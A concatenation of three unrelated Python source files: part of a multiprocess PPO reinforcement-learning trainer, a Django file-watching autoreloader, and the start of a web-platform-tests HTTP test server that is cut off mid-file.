if x.dim() == 2:
bias = self._bias.t().view(1, -1)
else:
bias = self._bias.t().view(1, -1, 1, 1)
return x + bias
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
self.linear4.weight.data.uniform_(-init_w, init_w)
self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# implementation 1
# self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# # implementation 2: not dependent on latent features, reference:https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/master/a2c_ppo_acktr/distributions.py
self.log_std = AddBias(torch.zeros(num_actions))
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
mean = self.action_range * F.tanh(self.mean_linear(x))
# implementation 1
# log_std = self.log_std_linear(x)
# log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
# implementation 2
zeros = torch.zeros(mean.size())
if state.is_cuda:
zeros = zeros.cuda()
log_std = self.log_std(zeros)
return mean, log_std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, log_std = self.forward(state)
std = log_std.exp()
normal = Normal(0, 1)
z = normal.sample()
action = mean+std*z
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
print(self.actor, self.critic)
def a_train(self, s, a, adv):
'''
Update policy network
:param s: state
:param a: action
:param adv: advantage
:return:
'''
mu, log_std = self.actor(s)
pi = Normal(mu, torch.exp(log_std))
mu_old, log_std_old = self.actor_old(s)
oldpi = Normal(mu_old, torch.exp(log_std_old))
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def update_old_pi(self):
'''
Update old policy parameter
:return: None
'''
for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
oldp.data.copy_(p)
def c_train(self, cumulative_r, s):
'''
Update actor network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def cal_adv(self, s, cumulative_r):
'''
Calculate advantage
:param s: state
:param cumulative_r: cumulative reward
:return: advantage
'''
advantage = cumulative_r - self.critic(s)
return advantage.detach()
def update(self, s, a, r):
'''
Update parameter with the constraint of KL divergent
:param s: state
:param a: act
:param r: reward
:return: None
'''
s = torch.FloatTensor(s).to(device)
a = torch.FloatTensor(a).to(device)
r = torch.FloatTensor(r).to(device)
self.update_old_pi()
adv = self.cal_adv(s, r)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv)
if kl > 4 * METHOD['kl_target']: # this in in google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
def choose_action(self, s):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
torch.save(self.actor_old.state_dict(), path+'_actor_old')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
self.actor.eval()
self.critic.eval()
self.actor_old.eval()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
buffer={
'state':[],
'action':[],
'reward':[]
}
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
buffer['state'].append(s)
buffer['action'].append(a)
# buffer['reward'].append(r)
buffer['reward'].append((r + 8) / 8) # normalize reward, find to be useful sometimes; from my experience, it works with 'penalty' version, while 'clip' verison works without this normalization
s = s_
ep_r += r
# update ppo
if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
if done:
v_s_=0
else:
v_s_ = ppo.get_v(s_)[0]
discounted_r = []
for r in buffer['reward'][::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
buffer['state'], buffer['action'], buffer['reward'] = [], [], []
ppo.update(bs, ba, br)
if done:
break
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.actor_old.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain shared and not shared
process.daemon=True # all processes closed when the main stops
processes.append(process)
[p.start() for p in processes]
while True: # keep geting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s))
if done:
break
if __name__ == '__main__':
main()
|
autoreload.py
|
"""
auto reload的设计思路,主进程和子进程,主进程一直监控子进程,子进程退出后,主进程启动一个新的子进程
"""
import functools
import itertools
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import traceback
import weakref
from collections import defaultdict
from pathlib import Path
from types import ModuleType
from zipimport import zipimporter
from django.apps import apps
from django.core.signals import request_finished
from django.dispatch import Signal
from django.utils.functional import cached_property
from django.utils.version import get_version_tuple
autoreload_started = Signal()
file_changed = Signal(providing_args=['file_path', 'kind'])
DJANGO_AUTORELOAD_ENV = 'RUN_MAIN'
logger = logging.getLogger('django.utils.autoreload')
# If an error is raised while importing a file, it's not placed in sys.modules.
# This means that any future modifications aren't caught. Keep a list of these
# file paths to allow watching them in the future.
_error_files = []
_exception = None
try:
import termios
except ImportError:
termios = None
try:
import pywatchman
except ImportError:
pywatchman = None
def check_errors(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
raise _exception[1]
def ensure_echo_on():
"""
Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after reload.
"""
if not termios or not sys.stdin.isatty():
return
attr_list = termios.tcgetattr(sys.stdin)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(sys.stdin, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def iter_all_python_module_files():
# This is a hot path during reloading. Create a stable sorted list of
# modules based on the module name and pass it to iter_modules_and_files().
# This ensures cached results are returned in the usual case that modules
# aren't loaded on the fly.
keys = sorted(sys.modules)
modules = tuple(m for m in map(sys.modules.__getitem__, keys) if not isinstance(m, weakref.ProxyTypes))
return iter_modules_and_files(modules, frozenset(_error_files))
@functools.lru_cache(maxsize=1)
def iter_modules_and_files(modules, extra_files):
"""Iterate through all modules needed to be watched."""
sys_file_paths = []
for module in modules:
# During debugging (with PyDev) the 'typing.io' and 'typing.re' objects
# are added to sys.modules, however they are types not modules and so
# cause issues here.
if not isinstance(module, ModuleType):
continue
if module.__name__ == '__main__':
# __main__ (usually manage.py) doesn't always have a __spec__ set.
# Handle this by falling back to using __file__, resolved below.
# See https://docs.python.org/reference/import.html#main-spec
# __file__ may not exists, e.g. when running ipdb debugger.
if hasattr(module, '__file__'):
sys_file_paths.append(module.__file__)
continue
if getattr(module, '__spec__', None) is None:
continue
spec = module.__spec__
# Modules could be loaded from places without a concrete location. If
# this is the case, skip them.
if spec.has_location:
origin = spec.loader.archive if isinstance(spec.loader, zipimporter) else spec.origin
sys_file_paths.append(origin)
results = set()
for filename in itertools.chain(sys_file_paths, extra_files):
if not filename:
continue
path = Path(filename)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
# The module could have been removed, don't fail loudly if this
# is the case.
continue
results.add(resolved_path)
return frozenset(results)
@functools.lru_cache(maxsize=1)
def common_roots(paths):
"""
Return a tuple of common roots that are shared between the given paths.
File system watchers operate on directories and aren't cheap to create.
Try to find the minimum set of directories to watch that encompass all of
the files that need to be watched.
"""
# Inspired from Werkzeug:
# https://github.com/pallets/werkzeug/blob/7477be2853df70a022d9613e765581b9411c3c39/werkzeug/_reloader.py
# Create a sorted list of the path components, longest first.
path_parts = sorted([x.parts for x in paths], key=len, reverse=True)
tree = {}
for chunks in path_parts:
node = tree
# Add each part of the path to the tree.
for chunk in chunks:
node = node.setdefault(chunk, {})
# Clear the last leaf in the tree.
node.clear()
# Turn the tree into a list of Path instances.
def _walk(node, path):
for prefix, child in node.items():
yield from _walk(child, path + (prefix,))
if not node:
yield Path(*path)
return tuple(_walk(tree, ()))
def sys_path_directories():
"""
Yield absolute directories from sys.path, ignoring entries that don't
exist.
"""
for path in sys.path:
path = Path(path)
try:
resolved_path = path.resolve(strict=True).absolute()
except FileNotFoundError:
continue
# If the path is a file (like a zip file), watch the parent directory.
if resolved_path.is_file():
yield resolved_path.parent
else:
yield resolved_path
def get_child_arguments():
"""
Return the executable. This contains a workaround for Windows if the
executable is reported to not have the .exe extension which can cause bugs
on reloading.
"""
import django.__main__
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions]
if sys.argv[0] == django.__main__.__file__:
# The server was started with `python -m django runserver`.
args += ['-m', 'django']
args += sys.argv[1:]
else:
args += sys.argv
return args
def trigger_reload(filename):
logger.info('%s changed, reloading.', filename)
sys.exit(3)
def restart_with_reloader():
new_environ = {**os.environ, DJANGO_AUTORELOAD_ENV: 'true'}
args = get_child_arguments()
while True:
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
class BaseReloader:
def __init__(self):
self.extra_files = set()
self.directory_globs = defaultdict(set)
self._stop_condition = threading.Event()
def watch_dir(self, path, glob):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching dir %s with glob %s.', path, glob)
self.directory_globs[path].add(glob)
def watch_file(self, path):
path = Path(path)
if not path.is_absolute():
raise ValueError('%s must be absolute.' % path)
logger.debug('Watching file %s.', path)
self.extra_files.add(path)
def watched_files(self, include_globs=True):
"""
Yield all files that need to be watched, including module files and
files within globs.
"""
yield from iter_all_python_module_files()
yield from self.extra_files
if include_globs:
for directory, patterns in self.directory_globs.items():
for pattern in patterns:
yield from directory.glob(pattern)
def wait_for_apps_ready(self, app_reg, django_main_thread):
"""
Wait until Django reports that the apps have been loaded. If the given
thread has terminated before the apps are ready, then a SyntaxError or
other non-recoverable error has been raised. In that case, stop waiting
for the apps_ready event and continue processing.
Return True if the thread is alive and the ready event has been
triggered, or False if the thread is terminated while waiting for the
event.
"""
while django_main_thread.is_alive():
if app_reg.ready_event.wait(timeout=0.1):
return True
else:
logger.debug('Main Django thread has terminated before apps are ready.')
return False
def run(self, django_main_thread):
logger.debug('Waiting for apps ready_event.')
self.wait_for_apps_ready(apps, django_main_thread)
from django.urls import get_resolver
# Prevent a race condition where URL modules aren't loaded when the
# reloader starts by accessing the urlconf_module property.
try:
get_resolver().urlconf_module
except Exception:
# Loading the urlconf can result in errors during development.
# If this occurs then swallow the error and continue.
pass
logger.debug('Apps ready_event triggered. Sending autoreload_started signal.')
autoreload_started.send(sender=self)
self.run_loop()
def run_loop(self):
ticker = self.tick()
while not self.should_stop:
try:
next(ticker)
except StopIteration:
break
self.stop()
def tick(self):
"""
This generator is called in a loop from run_loop. It's important that
the method takes care of pausing or otherwise waiting for a period of
time. This split between run_loop() and tick() is to improve the
testability of the reloader implementations by decoupling the work they
do from the loop.
"""
raise NotImplementedError('subclasses must implement tick().')
@classmethod
def check_availability(cls):
raise NotImplementedError('subclasses must implement check_availability().')
def notify_file_changed(self, path):
results = file_changed.send(sender=self, file_path=path)
logger.debug('%s notified as changed. Signal results: %s.', path, results)
if not any(res[1] for res in results):
trigger_reload(path)
# These are primarily used for testing.
@property
def should_stop(self):
return self._stop_condition.is_set()
def stop(self):
self._stop_condition.set()
class StatReloader(BaseReloader):
SLEEP_TIME = 1 # Check for changes once per second.
def tick(self):
mtimes = {}
while True:
for filepath, mtime in self.snapshot_files():
old_time = mtimes.get(filepath)
mtimes[filepath] = mtime
if old_time is None:
logger.debug('File %s first seen with mtime %s', filepath, mtime)
continue
elif mtime > old_time:
logger.debug('File %s previous mtime: %s, current mtime: %s', filepath, old_time, mtime)
self.notify_file_changed(filepath)
time.sleep(self.SLEEP_TIME)
yield
def snapshot_files(self):
# watched_files may produce duplicate paths if globs overlap.
seen_files = set()
for file in self.watched_files():
if file in seen_files:
continue
try:
mtime = file.stat().st_mtime
except OSError:
# This is thrown when the file does not exist.
continue
seen_files.add(file)
yield file, mtime
@classmethod
def check_availability(cls):
return True
class WatchmanUnavailable(RuntimeError):
pass
class WatchmanReloader(BaseReloader):
def __init__(self):
self.roots = defaultdict(set)
self.processed_request = threading.Event()
self.client_timeout = int(os.environ.get('DJANGO_WATCHMAN_TIMEOUT', 5))
super().__init__()
@cached_property
def client(self):
return pywatchman.client(timeout=self.client_timeout)
def _watch_root(self, root):
# In practice this shouldn't occur, however, it's possible that a
# directory that doesn't exist yet is being watched. If it's outside of
# sys.path then this will end up a new root. How to handle this isn't
# clear: Not adding the root will likely break when subscribing to the
# changes, however, as this is currently an internal API, no files
# will be being watched outside of sys.path. Fixing this by checking
# inside watch_glob() and watch_dir() is expensive, instead this could
# could fall back to the StatReloader if this case is detected? For
# now, watching its parent, if possible, is sufficient.
if not root.exists():
if not root.parent.exists():
logger.warning('Unable to watch root dir %s as neither it or its parent exist.', root)
return
root = root.parent
result = self.client.query('watch-project', str(root.absolute()))
if 'warning' in result:
logger.warning('Watchman warning: %s', result['warning'])
logger.debug('Watchman watch-project result: %s', result)
return result['watch'], result.get('relative_path')
@functools.lru_cache()
def _get_clock(self, root):
return self.client.query('clock', root)['clock']
def _subscribe(self, directory, name, expression):
root, rel_path = self._watch_root(directory)
query = {
'expression': expression,
'fields': ['name'],
'since': self._get_clock(root),
'dedup_results': True,
}
if rel_path:
query['relative_root'] = rel_path
logger.debug('Issuing watchman subscription %s, for root %s. Query: %s', name, root, query)
self.client.query('subscribe', root, name, query)
def _subscribe_dir(self, directory, filenames):
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'files-parent-%s' % directory.name
filenames = ['%s/%s' % (directory.name, filename) for filename in filenames]
directory = directory.parent
expression = ['name', filenames, 'wholename']
else:
prefix = 'files'
expression = ['name', filenames]
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def _watch_glob(self, directory, patterns):
"""
Watch a directory with a specific glob. If the directory doesn't yet
exist, attempt to watch the parent directory and amend the patterns to
include this. It's important this method isn't called more than one per
directory when updating all subscriptions. Subsequent calls will
overwrite the named subscription, so it must include all possible glob
expressions.
"""
prefix = 'glob'
if not directory.exists():
if not directory.parent.exists():
logger.warning('Unable to watch directory %s as neither it or its parent exist.', directory)
return
prefix = 'glob-parent-%s' % directory.name
patterns = ['%s/%s' % (directory.name, pattern) for pattern in patterns]
directory = directory.parent
expression = ['anyof']
for pattern in patterns:
expression.append(['match', pattern, 'wholename'])
self._subscribe(directory, '%s:%s' % (prefix, directory), expression)
def watched_roots(self, watched_files):
extra_directories = self.directory_globs.keys()
watched_file_dirs = [f.parent for f in watched_files]
sys_paths = list(sys_path_directories())
return frozenset((*extra_directories, *watched_file_dirs, *sys_paths))
def _update_watches(self):
watched_files = list(self.watched_files(include_globs=False))
found_roots = common_roots(self.watched_roots(watched_files))
logger.debug('Watching %s files', len(watched_files))
logger.debug('Found common roots: %s', found_roots)
# Setup initial roots for performance, shortest roots first.
for root in sorted(found_roots):
self._watch_root(root)
for directory, patterns in self.directory_globs.items():
self._watch_glob(directory, patterns)
# Group sorted watched_files by their parent directory.
sorted_files = sorted(watched_files, key=lambda p: p.parent)
for directory, group in itertools.groupby(sorted_files, key=lambda p: p.parent):
# These paths need to be relative to the parent directory.
self._subscribe_dir(directory, [str(p.relative_to(directory)) for p in group])
def update_watches(self):
try:
self._update_watches()
except Exception as ex:
# If the service is still available, raise the original exception.
if self.check_server_status(ex):
raise
def _check_subscription(self, sub):
subscription = self.client.getSubscription(sub)
if not subscription:
return
logger.debug('Watchman subscription %s has results.', sub)
for result in subscription:
# When using watch-project, it's not simple to get the relative
# directory without storing some specific state. Store the full
# path to the directory in the subscription name, prefixed by its
# type (glob, files).
root_directory = Path(result['subscription'].split(':', 1)[1])
logger.debug('Found root directory %s', root_directory)
for file in result.get('files', []):
self.notify_file_changed(root_directory / file)
def request_processed(self, **kwargs):
logger.debug('Request processed. Setting update_watches event.')
self.processed_request.set()
def tick(self):
request_finished.connect(self.request_processed)
self.update_watches()
while True:
if self.processed_request.is_set():
self.update_watches()
self.processed_request.clear()
try:
self.client.receive()
except pywatchman.SocketTimeout:
pass
except pywatchman.WatchmanError as ex:
logger.debug('Watchman error: %s, checking server status.', ex)
self.check_server_status(ex)
else:
for sub in list(self.client.subs.keys()):
self._check_subscription(sub)
yield
def stop(self):
self.client.close()
super().stop()
def check_server_status(self, inner_ex=None):
"""Return True if the server is available."""
try:
self.client.query('version')
except Exception:
raise WatchmanUnavailable(str(inner_ex)) from inner_ex
return True
@classmethod
def check_availability(cls):
if not pywatchman:
raise WatchmanUnavailable('pywatchman not installed.')
client = pywatchman.client(timeout=0.1)
try:
result = client.capabilityCheck()
except Exception:
# The service is down?
raise WatchmanUnavailable('Cannot connect to the watchman service.')
version = get_version_tuple(result['version'])
# Watchman 4.9 includes multiple improvements to watching project
# directories as well as case insensitive filesystems.
logger.debug('Watchman version %s', version)
if version < (4, 9):
raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
"""Return the most suitable reloader for this environment."""
try:
WatchmanReloader.check_availability()
except WatchmanUnavailable:
return StatReloader()
return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
ensure_echo_on()
main_func = check_errors(main_func)
django_main_thread = threading.Thread(target=main_func, args=args, kwargs=kwargs, name='django-main-thread')
django_main_thread.setDaemon(True)
django_main_thread.start()
while not reloader.should_stop:
try:
reloader.run(django_main_thread)
except WatchmanUnavailable as ex:
# It's possible that the watchman service shuts down or otherwise
# becomes unavailable. In that case, use the StatReloader.
reloader = StatReloader()
logger.error('Error connecting to Watchman: %s', ex)
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
reloader = get_reloader()
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
start_django(reloader, main_func, *args, **kwargs)
else:
exit_code = restart_with_reloader()
sys.exit(exit_code)
except KeyboardInterrupt:
pass
|
server.py
|
import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter:
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (bytes, str)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address, ws_doc_root=None,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param ws_doc_root: Document root for websockets
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(self.logger,
browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.ws_doc_root = ws_doc_root
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, OSError) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
msg = traceback.format_exc()
self.logger.error("%s %s" % (type(error), error))
self.logger.info(msg)
